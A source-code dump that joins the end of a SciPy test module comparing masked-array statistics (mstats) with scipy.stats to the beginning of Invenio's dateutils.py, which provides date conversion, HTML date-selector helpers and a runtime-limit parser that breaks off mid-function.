            warnings.filterwarnings('ignore')
            assert_equal((np.abs(t), p), (np.inf, 0))
        assert_array_equal(mstats.ttest_ind([0, 0, 0], [0, 0, 0]),
                           (np.nan, np.nan))
        t, p = mstats.ttest_ind([0, 0, 0], [1, 1, 1], equal_var=False)
        with warnings.catch_warnings():
            warnings.filterwarnings('ignore')
            assert_equal((np.abs(t), p), (np.inf, 0))
        assert_array_equal(mstats.ttest_ind([0, 0, 0], [0, 0, 0],
                                            equal_var=False),
                           (np.nan, np.nan))
class TestTtest_1samp():
    # mstats.ttest_1samp vs stats.ttest_1samp, plus masked/degenerate input.
    def test_vs_nonmasked(self):
        np.random.seed(1234567)
        outcome = np.random.randn(20, 4) + [0, 0, 1, 2]
        # 1-D inputs
        res1 = stats.ttest_1samp(outcome[:, 0], 1)
        res2 = mstats.ttest_1samp(outcome[:, 0], 1)
        assert_allclose(res1, res2)
        # 2-D inputs
        res1 = stats.ttest_1samp(outcome[:, 0], outcome[:, 1], axis=None)
        res2 = mstats.ttest_1samp(outcome[:, 0], outcome[:, 1], axis=None)
        assert_allclose(res1, res2)
        res1 = stats.ttest_1samp(outcome[:, :2], outcome[:, 2:], axis=0)
        res2 = mstats.ttest_1samp(outcome[:, :2], outcome[:, 2:], axis=0)
        assert_allclose(res1, res2)
        # Check default is axis=0
        res3 = mstats.ttest_1samp(outcome[:, :2], outcome[:, 2:])
        assert_allclose(res2, res3)
    def test_fully_masked(self):
        # Fully-masked or all-NaN samples must yield (nan, nan).
        np.random.seed(1234567)
        outcome = ma.masked_array(np.random.randn(3), mask=[1, 1, 1])
        with warnings.catch_warnings():
            warnings.filterwarnings('ignore')
            assert_array_equal(mstats.ttest_1samp(outcome, 0.0),
                               (np.nan, np.nan))
            assert_array_equal(mstats.ttest_1samp((np.nan, np.nan), 0.0),
                               (np.nan, np.nan))
    def test_result_attributes(self):
        np.random.seed(1234567)
        outcome = np.random.randn(20, 4) + [0, 0, 1, 2]
        res = mstats.ttest_1samp(outcome[:, 0], 1)
        attributes = ('statistic', 'pvalue')
        check_named_results(res, attributes, ma=True)
    def test_empty(self):
        res1 = mstats.ttest_1samp([], 1)
        assert_(np.all(np.isnan(res1)))
    def test_zero_division(self):
        # Zero-variance sample vs nonzero popmean gives |t|=inf, p=0;
        # popmean equal to the constant sample gives (nan, nan).
        t, p = mstats.ttest_1samp([0, 0, 0], 1)
        with warnings.catch_warnings():
            warnings.filterwarnings('ignore')
            assert_equal((np.abs(t), p), (np.inf, 0))
        assert_array_equal(mstats.ttest_1samp([0, 0, 0], 0),
                           (np.nan, np.nan))
class TestCompareWithStats(TestCase):
    """
    Class to compare mstats results with stats results.
    It is in general assumed that scipy.stats is at a more mature stage than
    stats.mstats. If a routine in mstats results in similar results like in
    scipy.stats, this is considered also as a proper validation of scipy.mstats
    routine.
    Different sample sizes are used for testing, as some problems between stats
    and mstats are dependent on sample size.
    Author: Alexander Loew
    NOTE that some tests fail. This might be caused by
    a) actual differences or bugs between stats and mstats
    b) numerical inaccuracies
    c) different definitions of routine interfaces
    These failures need to be checked. Current workaround is to have disabled these tests,
    but issuing reports on scipy-dev
    """
    def get_n(self):
        """ Returns list of sample sizes to be used for comparison. """
        return [1000, 100, 10, 5]
    def generate_xy_sample(self, n):
        # This routine generates numpy arrays and corresponding masked arrays
        # with the same data, but additional masked values
        np.random.seed(1234567)
        x = np.random.randn(n)
        y = x + np.random.randn(n)
        # Pad with huge sentinel values, then mask everything above 9e15, so
        # the masked arrays hold the same data plus trailing masked slots.
        xm = np.ones(len(x) + 5) * 1e16
        ym = np.ones(len(y) + 5) * 1e16
        xm[0:len(x)] = x
        ym[0:len(y)] = y
        mask = xm > 9e15
        xm = np.ma.array(xm, mask=mask)
        ym = np.ma.array(ym, mask=mask)
        return x, y, xm, ym
    def generate_xy_sample2D(self, n, nx):
        # 2-D variant: each of the nx columns is an independent 1-D sample;
        # the masked arrays carry 5 NaN padding rows that get masked out.
        x = np.ones((n, nx)) * np.nan
        y = np.ones((n, nx)) * np.nan
        xm = np.ones((n+5, nx)) * np.nan
        ym = np.ones((n+5, nx)) * np.nan
        for i in range(nx):
            x[:,i], y[:,i], dx, dy = self.generate_xy_sample(n)
        xm[0:n, :] = x[0:n]
        ym[0:n, :] = y[0:n]
        xm = np.ma.array(xm, mask=np.isnan(xm))
        ym = np.ma.array(ym, mask=np.isnan(ym))
        return x, y, xm, ym
    def test_linregress(self):
        for n in self.get_n():
            x, y, xm, ym = self.generate_xy_sample(n)
            res1 = stats.linregress(x, y)
            res2 = stats.mstats.linregress(xm, ym)
            assert_allclose(np.asarray(res1), np.asarray(res2))
    def test_pearsonr(self):
        for n in self.get_n():
            x, y, xm, ym = self.generate_xy_sample(n)
            r, p = stats.pearsonr(x, y)
            rm, pm = stats.mstats.pearsonr(xm, ym)
            assert_almost_equal(r, rm, decimal=14)
            assert_almost_equal(p, pm, decimal=14)
    def test_spearmanr(self):
        for n in self.get_n():
            x, y, xm, ym = self.generate_xy_sample(n)
            r, p = stats.spearmanr(x, y)
            rm, pm = stats.mstats.spearmanr(xm, ym)
            assert_almost_equal(r, rm, 14)
            assert_almost_equal(p, pm, 14)
    def test_gmean(self):
        for n in self.get_n():
            x, y, xm, ym = self.generate_xy_sample(n)
            r = stats.gmean(abs(x))
            rm = stats.mstats.gmean(abs(xm))
            assert_allclose(r, rm, rtol=1e-13)
            r = stats.gmean(abs(y))
            rm = stats.mstats.gmean(abs(ym))
            assert_allclose(r, rm, rtol=1e-13)
    def test_hmean(self):
        for n in self.get_n():
            x, y, xm, ym = self.generate_xy_sample(n)
            r = stats.hmean(abs(x))
            rm = stats.mstats.hmean(abs(xm))
            assert_almost_equal(r, rm, 10)
            r = stats.hmean(abs(y))
            rm = stats.mstats.hmean(abs(ym))
            assert_almost_equal(r, rm, 10)
    def test_skew(self):
        for n in self.get_n():
            x, y, xm, ym = self.generate_xy_sample(n)
            r = stats.skew(x)
            rm = stats.mstats.skew(xm)
            assert_almost_equal(r, rm, 10)
            r = stats.skew(y)
            rm = stats.mstats.skew(ym)
            assert_almost_equal(r, rm, 10)
    def test_moment(self):
        for n in self.get_n():
            x, y, xm, ym = self.generate_xy_sample(n)
            r = stats.moment(x)
            rm = stats.mstats.moment(xm)
            assert_almost_equal(r, rm, 10)
            r = stats.moment(y)
            rm = stats.mstats.moment(ym)
            assert_almost_equal(r, rm, 10)
    def test_signaltonoise(self):
        # signaltonoise is deprecated; silence the warning for the comparison.
        with warnings.catch_warnings():
            warnings.simplefilter("ignore", DeprecationWarning)
            for n in self.get_n():
                x, y, xm, ym = self.generate_xy_sample(n)
                r = stats.signaltonoise(x)
                rm = stats.mstats.signaltonoise(xm)
                assert_almost_equal(r, rm, 10)
                r = stats.signaltonoise(y)
                rm = stats.mstats.signaltonoise(ym)
                assert_almost_equal(r, rm, 10)
    def test_betai(self):
        np.random.seed(12345)
        for i in range(10):
            a = np.random.rand() * 5.
            b = np.random.rand() * 200.
            with warnings.catch_warnings():
                warnings.filterwarnings('ignore', category=DeprecationWarning)
                assert_equal(stats.betai(a, b, 0.), 0.)
                assert_equal(stats.betai(a, b, 1.), 1.)
                assert_equal(stats.mstats.betai(a, b, 0.), 0.)
                assert_equal(stats.mstats.betai(a, b, 1.), 1.)
                x = np.random.rand()
                assert_almost_equal(stats.betai(a, b, x),
                                    stats.mstats.betai(a, b, x), decimal=13)
    def test_zscore(self):
        for n in self.get_n():
            x, y, xm, ym = self.generate_xy_sample(n)
            #reference solution
            zx = (x - x.mean()) / x.std()
            zy = (y - y.mean()) / y.std()
            #validate stats
            assert_allclose(stats.zscore(x), zx, rtol=1e-10)
            assert_allclose(stats.zscore(y), zy, rtol=1e-10)
            #compare stats and mstats
            assert_allclose(stats.zscore(x), stats.mstats.zscore(xm[0:len(x)]),
                            rtol=1e-10)
            assert_allclose(stats.zscore(y), stats.mstats.zscore(ym[0:len(y)]),
                            rtol=1e-10)
    def test_kurtosis(self):
        for n in self.get_n():
            x, y, xm, ym = self.generate_xy_sample(n)
            r = stats.kurtosis(x)
            rm = stats.mstats.kurtosis(xm)
            assert_almost_equal(r, rm, 10)
            r = stats.kurtosis(y)
            rm = stats.mstats.kurtosis(ym)
            assert_almost_equal(r, rm, 10)
    def test_sem(self):
        # example from stats.sem doc
        a = np.arange(20).reshape(5,4)
        am = np.ma.array(a)
        r = stats.sem(a,ddof=1)
        rm = stats.mstats.sem(am, ddof=1)
        assert_allclose(r, 2.82842712, atol=1e-5)
        assert_allclose(rm, 2.82842712, atol=1e-5)
        for n in self.get_n():
            x, y, xm, ym = self.generate_xy_sample(n)
            assert_almost_equal(stats.mstats.sem(xm, axis=None, ddof=0),
                                stats.sem(x, axis=None, ddof=0), decimal=13)
            assert_almost_equal(stats.mstats.sem(ym, axis=None, ddof=0),
                                stats.sem(y, axis=None, ddof=0), decimal=13)
            assert_almost_equal(stats.mstats.sem(xm, axis=None, ddof=1),
                                stats.sem(x, axis=None, ddof=1), decimal=13)
            assert_almost_equal(stats.mstats.sem(ym, axis=None, ddof=1),
                                stats.sem(y, axis=None, ddof=1), decimal=13)
    def test_describe(self):
        for n in self.get_n():
            x, y, xm, ym = self.generate_xy_sample(n)
            r = stats.describe(x, ddof=1)
            rm = stats.mstats.describe(xm, ddof=1)
            for ii in range(6):
                assert_almost_equal(np.asarray(r[ii]),
                                    np.asarray(rm[ii]),
                                    decimal=12)
    def test_describe_result_attributes(self):
        actual = mstats.describe(np.arange(5))
        attributes = ('nobs', 'minmax', 'mean', 'variance', 'skewness',
                      'kurtosis')
        check_named_results(actual, attributes, ma=True)
    def test_rankdata(self):
        # NOTE(review): the mstats call receives the unmasked x, so the
        # masked array xm is generated but never used here -- confirm intent.
        for n in self.get_n():
            x, y, xm, ym = self.generate_xy_sample(n)
            r = stats.rankdata(x)
            rm = stats.mstats.rankdata(x)
            assert_allclose(r, rm)
    def test_tmean(self):
        for n in self.get_n():
            x, y, xm, ym = self.generate_xy_sample(n)
            assert_almost_equal(stats.tmean(x),stats.mstats.tmean(xm), 14)
            assert_almost_equal(stats.tmean(y),stats.mstats.tmean(ym), 14)
    def test_tmax(self):
        for n in self.get_n():
            x, y, xm, ym = self.generate_xy_sample(n)
            assert_almost_equal(stats.tmax(x,2.),
                                stats.mstats.tmax(xm,2.), 10)
            assert_almost_equal(stats.tmax(y,2.),
                                stats.mstats.tmax(ym,2.), 10)
            assert_almost_equal(stats.tmax(x, upperlimit=3.),
                                stats.mstats.tmax(xm, upperlimit=3.), 10)
            assert_almost_equal(stats.tmax(y, upperlimit=3.),
                                stats.mstats.tmax(ym, upperlimit=3.), 10)
    def test_tmin(self):
        for n in self.get_n():
            x, y, xm, ym = self.generate_xy_sample(n)
            assert_equal(stats.tmin(x),stats.mstats.tmin(xm))
            assert_equal(stats.tmin(y),stats.mstats.tmin(ym))
            assert_almost_equal(stats.tmin(x,lowerlimit=-1.),
                                stats.mstats.tmin(xm,lowerlimit=-1.), 10)
            assert_almost_equal(stats.tmin(y,lowerlimit=-1.),
                                stats.mstats.tmin(ym,lowerlimit=-1.), 10)
    def test_zmap(self):
        for n in self.get_n():
            x, y, xm, ym = self.generate_xy_sample(n)
            z = stats.zmap(x,y)
            zm = stats.mstats.zmap(xm,ym)
            assert_allclose(z, zm[0:len(z)], atol=1e-10)
    def test_variation(self):
        for n in self.get_n():
            x, y, xm, ym = self.generate_xy_sample(n)
            assert_almost_equal(stats.variation(x), stats.mstats.variation(xm),
                                decimal=12)
            assert_almost_equal(stats.variation(y), stats.mstats.variation(ym),
                                decimal=12)
    def test_tvar(self):
        for n in self.get_n():
            x, y, xm, ym = self.generate_xy_sample(n)
            assert_almost_equal(stats.tvar(x), stats.mstats.tvar(xm),
                                decimal=12)
            assert_almost_equal(stats.tvar(y), stats.mstats.tvar(ym),
                                decimal=12)
    def test_trimboth(self):
        a = np.arange(20)
        b = stats.trimboth(a, 0.1)
        bm = stats.mstats.trimboth(a, 0.1)
        assert_allclose(np.sort(b), bm.data[~bm.mask])
    def test_tsem(self):
        for n in self.get_n():
            x, y, xm, ym = self.generate_xy_sample(n)
            assert_almost_equal(stats.tsem(x),stats.mstats.tsem(xm), decimal=14)
            assert_almost_equal(stats.tsem(y),stats.mstats.tsem(ym), decimal=14)
            assert_almost_equal(stats.tsem(x,limits=(-2.,2.)),
                                stats.mstats.tsem(xm,limits=(-2.,2.)),
                                decimal=14)
    def test_skewtest(self):
        # this test is for 1D data
        for n in self.get_n():
            if n > 8:
                x, y, xm, ym = self.generate_xy_sample(n)
                r = stats.skewtest(x)
                rm = stats.mstats.skewtest(xm)
                assert_allclose(r[0], rm[0], rtol=1e-15)
                # TODO this test is not performed as it is a known issue that
                # mstats returns a slightly different p-value what is a bit
                # strange is that other tests like test_maskedarray_input don't
                # fail!
                #~ assert_almost_equal(r[1], rm[1])
    def test_skewtest_result_attributes(self):
        x = np.array((-2, -1, 0, 1, 2, 3)*4)**2
        res = mstats.skewtest(x)
        attributes = ('statistic', 'pvalue')
        check_named_results(res, attributes, ma=True)
    def test_skewtest_2D_notmasked(self):
        # a normal ndarray is passed to the masked function
        x = np.random.random((20, 2)) * 20.
        r = stats.skewtest(x)
        rm = stats.mstats.skewtest(x)
        assert_allclose(np.asarray(r), np.asarray(rm))
    def test_skewtest_2D_WithMask(self):
        nx = 2
        for n in self.get_n():
            if n > 8:
                x, y, xm, ym = self.generate_xy_sample2D(n, nx)
                r = stats.skewtest(x)
                rm = stats.mstats.skewtest(xm)
                assert_equal(r[0][0],rm[0][0])
                assert_equal(r[0][1],rm[0][1])
    def test_normaltest(self):
        # NOTE(review): np.seterr changes the global numpy error state and is
        # never restored -- consider np.errstate as a context manager.
        np.seterr(over='raise')
        for n in self.get_n():
            if n > 8:
                with warnings.catch_warnings():
                    warnings.filterwarnings('ignore', category=UserWarning)
                    x, y, xm, ym = self.generate_xy_sample(n)
                    r = stats.normaltest(x)
                    rm = stats.mstats.normaltest(xm)
                    assert_allclose(np.asarray(r), np.asarray(rm))
    def test_find_repeats(self):
        x = np.asarray([1,1,2,2,3,3,3,4,4,4,4]).astype('float')
        tmp = np.asarray([1,1,2,2,3,3,3,4,4,4,4,5,5,5,5]).astype('float')
        mask = (tmp == 5.)
        xm = np.ma.array(tmp, mask=mask)
        x_orig, xm_orig = x.copy(), xm.copy()
        r = stats.find_repeats(x)
        rm = stats.mstats.find_repeats(xm)
        assert_equal(r, rm)
        # the inputs must not be modified in place
        assert_equal(x, x_orig)
        assert_equal(xm, xm_orig)
        # This crazy behavior is expected by count_tied_groups, but is not
        # in the docstring...
        _, counts = stats.mstats.find_repeats([])
        assert_equal(counts, np.array(0, dtype=np.intp))
    def test_kendalltau(self):
        for n in self.get_n():
            x, y, xm, ym = self.generate_xy_sample(n)
            r = stats.kendalltau(x, y)
            rm = stats.mstats.kendalltau(xm, ym)
            assert_almost_equal(r[0], rm[0], decimal=10)
            assert_almost_equal(r[1], rm[1], decimal=7)
    def test_obrientransform(self):
        for n in self.get_n():
            x, y, xm, ym = self.generate_xy_sample(n)
            r = stats.obrientransform(x)
            rm = stats.mstats.obrientransform(xm)
            assert_almost_equal(r.T, rm[0:len(x)])
# Run this module's test suite when executed as a script.
if __name__ == "__main__":
    run_module_suite()
| agpl-3.0 |
Dziolas/invenio | modules/miscutil/lib/dateutils.py | 11 | 18834 | # -*- coding: utf-8 -*-
##
## Some functions about dates
##
## This file is part of Invenio.
## Copyright (C) 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
API for date conversion and date related GUI creation.
Lexicon
datetext:
textual format => 'YEAR-MONTH-DAY HOUR:MINUTE:SECOND'
e.g. '2005-11-16 15:11:44'
default value: '0000-00-00 00:00:00'
datestruct:
tuple format => see http://docs.python.org/lib/module-time.html
(YEAR, MONTH, DAY, HOUR, MINUTE, SECOND, WEEKDAY, YEARDAY, DAYLIGHT)
e.g. (2005, 11, 16, 15, 11, 44, 2, 320, 0)
default value: (0, 0, 0, 0, 0, 0, 0, 0, 0)
dategui:
textual format for output => 'DAY MONTH YEAR, HOUR:MINUTE'
e.g. '16 nov 2005, 15:11'
default value: _("N/A")
"""
__revision__ = "$Id$"
import re
import time
from datetime import date as real_date, \
datetime as real_datetime, \
time as real_time, \
timedelta
from invenio.config import CFG_SITE_LANG
from invenio.messages import gettext_set_language
try:
from mx.DateTime import Parser
CFG_HAS_EGENIX_DATETIME = True
except ImportError:
CFG_HAS_EGENIX_DATETIME = False
# Canonical "empty" placeholder values and the canonical textual
# timestamp format used throughout this module.
datetext_default = '0000-00-00 00:00:00'
datestruct_default = (0, 0, 0, 0, 0, 0, 0, 0, 0)
datetext_format = "%Y-%m-%d %H:%M:%S"
class date(real_date):
    # datetime.date subclass whose strftime() delegates to this module's
    # strftime(), which also handles years before 1900.
    def strftime(self, fmt):
        return strftime(fmt, self)
class datetime(real_datetime):
    # datetime.datetime subclass with pre-1900 strftime() support, whose
    # helpers keep returning this module's subclasses.
    def strftime(self, fmt):
        return strftime(fmt, self)
    def __add__(self, other):
        # Perform the addition on a real_datetime, then re-wrap the result
        # via combine() so the sum is again an instance of this subclass.
        d = real_datetime.combine(self, self.timetz())
        d += other
        return self.combine(d, d.timetz())
    def date(self):
        # Return the date part as this module's date subclass.
        return date(self.year, self.month, self.day)
    @staticmethod
    def strptime(date_string, format):
        # Parse with time.strptime and build an instance from the first six
        # fields (year, month, day, hour, minute, second).
        return datetime(*(time.strptime(date_string, format)[0:6]))
def convert_datetext_to_dategui(datetext, ln=CFG_SITE_LANG, secs=False):
    """
    Convert:
    '2005-11-16 15:11:57' => '16 nov 2005, 15:11'
    Or optionally with seconds:
    '2005-11-16 15:11:57' => '16 nov 2005, 15:11:57'
    Month is internationalized

    @param datetext: date in 'YEAR-MONTH-DAY HOUR:MINUTE:SECOND' format
    @param ln: language for the month name
    @param secs: if True, include seconds in the output
    @return: the localized date string, or _("N/A") on invalid input
    """
    try:
        datestruct = convert_datetext_to_datestruct(datetext)
        if datestruct == datestruct_default:
            # Parsing failed; route to the N/A branch below.
            raise ValueError
        month = get_i18n_month_name(datestruct[1], ln=ln)
        if secs:
            output_format = "%d " + month + " %Y, %H:%M:%S"
        else:
            output_format = "%d " + month + " %Y, %H:%M"
        return strftime(output_format, datestruct)
    except Exception:
        # Narrowed from a bare 'except:' so that KeyboardInterrupt and
        # SystemExit are no longer swallowed.
        _ = gettext_set_language(ln)
        return _("N/A")
def convert_datetext_to_datestruct(datetext):
    """
    Convert:
    '2005-11-16 15:11:57' => (2005, 11, 16, 15, 11, 57, 2, 320, -1)

    @param datetext: date in 'YEAR-MONTH-DAY HOUR:MINUTE:SECOND' format
    @return: time.struct_time, or datestruct_default on invalid input
    """
    try:
        return time.strptime(datetext, datetext_format)
    except (ValueError, TypeError):
        # strptime raises ValueError for malformed strings and TypeError for
        # non-string input; narrowed from a bare 'except:' which would also
        # hide KeyboardInterrupt/SystemExit.
        return datestruct_default
def convert_datestruct_to_dategui(datestruct, ln=CFG_SITE_LANG):
    """
    Convert:
    (2005, 11, 16, 15, 11, 44, 2, 320, 0) => '16 nov 2005, 15:11'
    Month is internationalized

    @param datestruct: time.struct_time-like tuple
    @param ln: language for the month name
    @return: the localized date string, or _("N/A") on invalid input
    """
    try:
        # A zero year, month or day marks the 'empty' default struct.
        if datestruct[0] and datestruct[1] and datestruct[2]:
            month = get_i18n_month_name(datestruct[1], ln=ln)
            output_format = "%d " + month + " %Y, %H:%M"
            return strftime(output_format, datestruct)
        else:
            raise ValueError
    except Exception:
        # Narrowed from a bare 'except:' so that system-exiting exceptions
        # are not swallowed; bad structs still fall through to N/A.
        _ = gettext_set_language(ln)
        return _("N/A")
def convert_datestruct_to_datetext(datestruct):
    """
    Convert:
    (2005, 11, 16, 15, 11, 44, 2, 320, 0) => '2005-11-16 15:11:44'

    @param datestruct: time.struct_time-like tuple
    @return: 'YEAR-MONTH-DAY HOUR:MINUTE:SECOND', or datetext_default if
        the struct cannot be formatted
    """
    try:
        return strftime(datetext_format, datestruct)
    except Exception:
        # Narrowed from a bare 'except:'; strftime can raise TypeError,
        # ValueError or IndexError on malformed structs.
        return datetext_default
def convert_datecvs_to_datestruct(datecvs):
    """
    Convert CVS $Date$ and
    $Id$
    formats into datestruct. Useful for later conversion of Last
    updated timestamps in the page footers.
    Example: '$Date$' => (2006, 09, 20, 19, 27, 11, 0, 0)
    """
    try:
        if datecvs.startswith("$Id"):
            # Fields 3 and 4 of an expanded $Id$ keyword are date and time.
            fields = datecvs.split(" ")
            return time.strptime(' '.join(fields[3:5]),
                                 '%Y/%m/%d %H:%M:%S')
        # here we have to use '$' + 'Date...' here, otherwise the CVS
        # commit would erase this time format to put commit date:
        expanded_format = '$' + 'Date: %Y/%m/%d %H:%M:%S $'
        return time.strptime(datecvs, expanded_format)
    except ValueError:
        return datestruct_default
def get_datetext(year, month, day):
    """
    year=2005, month=11, day=16 => '2005-11-16 00:00:00'

    @return: the canonical datetext for the given date, or datetext_default
        if the values do not form a valid date.
    """
    input_format = "%Y-%m-%d"
    try:
        datestruct = time.strptime("%i-%i-%i" % (year, month, day), input_format)
        return strftime(datetext_format, datestruct)
    except (ValueError, TypeError):
        # ValueError for impossible dates, TypeError for non-integer input;
        # narrowed from a bare 'except:'.
        return datetext_default
def get_datestruct(year, month, day):
    """
    year=2005, month=11, day=16 => (2005, 11, 16, 0, 0, 0, 2, 320, -1)

    @return: time.struct_time for the given date, or datestruct_default if
        the values do not form a valid date.
    """
    input_format = "%Y-%m-%d"
    try:
        return time.strptime("%i-%i-%i" % (year, month, day), input_format)
    except (ValueError, TypeError):
        # BUGFIX: 'except ValueError or TypeError' evaluates to just
        # ValueError ('or' returns its first truthy operand), so TypeError
        # escaped; an exception tuple catches both.
        return datestruct_default
def get_i18n_day_name(day_nb, display='short', ln=CFG_SITE_LANG):
    """
    get the string representation of a weekday, internationalized
    @param day_nb: number of weekday UNIX like.
                   => 0=Sunday
    @param display: 'short' for abbreviated names ('Sun'); any other value
                    selects the full names ('Sunday')
    @param ln: language for output
    @return: the string representation of the day
    @raise KeyError: if day_nb is outside 0..6
    """
    _ = gettext_set_language(ln)
    # The _("...") literals must stay as plain string literals so gettext
    # message extraction can find them.
    if display == 'short':
        days = {0: _("Sun"),
                1: _("Mon"),
                2: _("Tue"),
                3: _("Wed"),
                4: _("Thu"),
                5: _("Fri"),
                6: _("Sat")}
    else:
        days = {0: _("Sunday"),
                1: _("Monday"),
                2: _("Tuesday"),
                3: _("Wednesday"),
                4: _("Thursday"),
                5: _("Friday"),
                6: _("Saturday")}
    return days[day_nb]
def get_i18n_month_name(month_nb, display='short', ln=CFG_SITE_LANG):
    """
    get a non-numeric representation of a month, internationalized.
    @param month_nb: number of month, (1 based!)
                     =>1=jan,..,12=dec; 0 yields the generic 'Month' label
    @param display: 'short' for abbreviated names ('Jan'); any other value
                    selects the full names ('January')
    @param ln: language for output
    @return: the string representation of month
    @raise KeyError: if month_nb is outside 0..12
    """
    _ = gettext_set_language(ln)
    # The _("...") literals must stay as plain string literals so gettext
    # message extraction can find them.
    if display == 'short':
        months = {0: _("Month"),
                  1: _("Jan"),
                  2: _("Feb"),
                  3: _("Mar"),
                  4: _("Apr"),
                  5: _("May"),
                  6: _("Jun"),
                  7: _("Jul"),
                  8: _("Aug"),
                  9: _("Sep"),
                  10: _("Oct"),
                  11: _("Nov"),
                  12: _("Dec")}
    else:
        months = {0: _("Month"),
                  1: _("January"),
                  2: _("February"),
                  3: _("March"),
                  4: _("April"),
                  5: _("May "), # trailing space distinguishes short/long form
                  6: _("June"),
                  7: _("July"),
                  8: _("August"),
                  9: _("September"),
                  10: _("October"),
                  11: _("November"),
                  12: _("December")}
    # strip() removes the trailing space used to disambiguate "May "/"May".
    return months[month_nb].strip()
def create_day_selectbox(name, selected_day=0, ln=CFG_SITE_LANG):
    """
    Creates an HTML menu for day selection. (0..31 values).
    @param name: name of the control (i.e. name of the var you'll get)
    @param selected_day: preselect a day. Use 0 for the label 'Day'
    @param ln: language of the menu
    @return: html a string
    """
    _ = gettext_set_language(ln)
    parts = ["<select name=\"%s\">\n" % name]
    for day in range(0, 32):
        option = " <option value=\"%i\"" % day
        if day == selected_day:
            option += " selected=\"selected\""
        if day == 0:
            # Day 0 renders the localized 'Day' placeholder label.
            option += ">%s</option>\n" % _("Day")
        else:
            option += ">%i</option>\n" % day
        parts.append(option)
    parts.append("</select>\n")
    return "".join(parts)
def create_month_selectbox(name, selected_month=0, ln=CFG_SITE_LANG):
    """
    Creates an HTML menu for month selection. Value of selected field is numeric
    @param name: name of the control (your form will be sent with name=value...)
    @param selected_month: preselect a month. use 0 for the Label 'Month'
    @param ln: language of the menu
    @return: html as string
    """
    out = "<select name=\"%s\">\n"% name
    for i in range(0, 13):
        out += "<option value=\"%i\""% i
        if (i == selected_month):
            out += " selected=\"selected\""
        # BUGFIX: ln must be passed as a keyword argument; positionally it
        # landed in get_i18n_month_name's 'display' parameter, so the
        # requested language was ignored and the long month form was
        # always produced.
        out += ">%s</option>\n"% get_i18n_month_name(i, ln=ln)
    out += "</select>\n"
    return out
def create_year_inputbox(name, value=0):
    """
    Creates an HTML field (simple input) for year selection.
    @param name: name of the control (i.e. name of the variable you'll get)
    @param value: prefilled value (int)
    @return: html as string
    """
    template = "<input type=\"text\" name=\"%s\" value=\"%i\" maxlength=\"4\" size=\"4\"/>\n"
    return template % (name, value)
def create_year_selectbox(name, from_year=-1, length=10, selected_year=0, ln=CFG_SITE_LANG):
    """
    Creates an HTML menu (dropdownbox) for year selection.
    @param name: name of control( i.e. name of the variable you'll get)
    @param from_year: year on which to begin. if <0 assume it is current year
    @param length: number of items in menu
    @param selected_year: initial selected year (if in range), else: label is selected
    @param ln: language
    @return: html as string
    """
    _ = gettext_set_language(ln)
    if from_year < 0:
        # Negative start year means "begin at the current year".
        from_year = time.localtime()[0]
    pieces = ["<select name=\"%s\">\n" % name]
    label = ' <option value="0"'
    if selected_year == 0:
        label += ' selected="selected"'
    label += ">%s</option>\n" % _("Year")
    pieces.append(label)
    for year in range(from_year, from_year + length):
        option = "<option value=\"%i\"" % year
        if year == selected_year:
            option += " selected=\"selected\""
        option += ">%i</option>\n" % year
        pieces.append(option)
    pieces.append("</select>\n")
    return "".join(pieces)
# Full runtime-limit spec: optional weekday (or weekday range) followed by an
# optional "hh[:mm][-hh[:mm]]" time window; used by parse_runtime_limit().
_RE_RUNTIMELIMIT_FULL = re.compile(r"(?:(?P<weekday_begin>[a-z]+)(?:-(?P<weekday_end>[a-z]+))?)?\s*((?P<hour_begin>\d\d?(:\d\d?)?)(-(?P<hour_end>\d\d?(:\d\d?)?))?)?", re.I)
# A single "hh[:mm]" time component (minutes optional).
_RE_RUNTIMELIMIT_HOUR = re.compile(r'(?P<hours>\d\d?)(:(?P<minutes>\d\d?))?')
def parse_runtime_limit(value, now=None):
    """
    Parsing CLI option for runtime limit, supplied as VALUE.
    Value could be something like: Sunday 23:00-05:00, the format being
    [Wee[kday]] [hh[:mm][-hh[:mm]]].
    The function will return two valid time ranges. The first could be in the past, containing the present or in the future. The second is always in the future.

    @param value: the textual runtime limit specification
    @param now: reference datetime; defaults to datetime.now() (mainly
        useful for testing)
    @return: ((start, end), (next_start, next_end)) datetime pairs
    @raise ValueError: if VALUE does not match the expected format
    """
    def extract_time(value):
        value = _RE_RUNTIMELIMIT_HOUR.search(value).groupdict()
        # BUGFIX: the minutes group is optional in 'hh[:mm]' and is None
        # when absent; int(None) raised TypeError for inputs like '23'.
        return timedelta(hours=int(value['hours']),
                         minutes=int(value['minutes'] or 0))
    def extract_weekday(value):
        key = value[:3].lower()
        try:
            return {
                'mon' : 0,
                'tue' : 1,
                'wed' : 2,
                'thu' : 3,
                'fri' : 4,
                'sat' : 5,
                'sun' : 6,
            }[key]
        except KeyError:
            raise ValueError("%s is not a good weekday name." % value)
    if now is None:
        now = datetime.now()
    today = now.date()
    g = _RE_RUNTIMELIMIT_FULL.search(value)
    if not g:
        raise ValueError('"%s" does not seem to be correct format for parse_runtime_limit() [Wee[kday]] [hh[:mm][-hh[:mm]]]).' % value)
    pieces = g.groupdict()
    if pieces['weekday_begin'] is None:
        # No weekday specified. So either today or tomorrow
        first_occasion_day = timedelta(days=0)
        next_occasion_delta = timedelta(days=1)
    else:
        # If given 'Mon' then we transform it to 'Mon-Mon'
        if pieces['weekday_end'] is None:
            pieces['weekday_end'] = pieces['weekday_begin']
        # Day range
        weekday_begin = extract_weekday(pieces['weekday_begin'])
        weekday_end = extract_weekday(pieces['weekday_end'])
        if weekday_begin <= today.weekday() <= weekday_end:
            first_occasion_day = timedelta(days=0)
        else:
            days = (weekday_begin - today.weekday()) % 7
            first_occasion_day = timedelta(days=days)
        weekday = (now + first_occasion_day).weekday()
        if weekday < weekday_end:
            # Fits in the same week
            next_occasion_delta = timedelta(days=1)
        else:
            # The week after
            days = weekday_begin - weekday + 7
            next_occasion_delta = timedelta(days=days)
    # Missing begin/end hours default to midnight.
    if pieces['hour_begin'] is None:
        pieces['hour_begin'] = '00:00'
    if pieces['hour_end'] is None:
        pieces['hour_end'] = '00:00'
